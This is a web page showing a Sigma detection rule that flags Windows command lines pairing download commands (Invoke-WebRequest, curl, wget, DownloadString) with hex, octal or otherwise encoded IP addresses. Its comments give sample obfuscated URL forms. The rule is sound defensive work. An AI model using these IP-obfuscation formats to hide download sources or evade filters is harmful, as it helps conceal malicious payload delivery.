Obfuscated IP Download Activity

calendar Jul 28, 2025 · attack.discovery  ·
Share on: linkedin copy

Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command

Sigma rule (View on GitHub)

 1title: Obfuscated IP Download Activity
 2id: cb5a2333-56cf-4562-8fcb-22ba1bca728d
 3status: test
 4description: Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command
 5references:
 6    - https://h.43z.one/ipconverter/
 7    - https://twitter.com/Yasser_Elsnbary/status/1553804135354564608
 8    - https://twitter.com/fr0s7_/status/1712780207105404948
 9author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems)
10date: 2022-08-03
11modified: 2025-07-18
12tags:
13    - attack.discovery
14logsource:
15    category: process_creation
16    product: windows
17detection:
18    selection_command:
19        CommandLine|contains:
20            - 'Invoke-WebRequest'
21            - 'iwr '
22            - 'Invoke-RestMethod'
23            - 'irm '
24            - 'wget '
25            - 'curl '
26            - 'DownloadFile'
27            - 'DownloadString'
28    selection_ip_1:
29        CommandLine|contains:
30            - ' 0x'
31            - '//0x'
32            - '.0x'
33            - '.00x'
34    selection_ip_2:
35        CommandLine|contains|all:
36            - 'http://%'
37            - '%2e'
38    selection_ip_3:
39        # http://81.4.31754
40        - CommandLine|re: 'https?://[0-9]{1,3}\.[0-9]{1,3}\.0[0-9]{3,4}'
41        # http://81.293898
42        - CommandLine|re: 'https?://[0-9]{1,3}\.0[0-9]{3,7}'
43        # http://1359248394
44        - CommandLine|re: 'https?://0[0-9]{3,11}'
45        # http://0121.04.0174.012
46        - CommandLine|re: 'https?://(0[0-9]{1,11}\.){3}0[0-9]{1,11}'
47        # http://012101076012
48        - CommandLine|re: 'https?://0[0-9]{1,11}'
49        # For octal format
50        - CommandLine|re: ' [0-7]{7,13}'
51    filter_main_valid_ip:
52        CommandLine|re: 'https?://((25[0-5]|(2[0-4]|1\d|[1-9])?\d)(\.|\b)){4}'
53    condition: selection_command and 1 of selection_ip_* and not 1 of filter_main_*
54falsepositives:
55    - Unknown
56level: medium

References


  • Read More

  • Something went wrong, but don’t fret — let’s give it another shot. Some privacy related extensions may cause issues on x.com. Please disable them and try again.


    Read More

  • Something went wrong, but don’t fret — let’s give it another shot. Some privacy related extensions may cause issues on x.com. Please disable them and try again.


    Read More

Related rules

to-top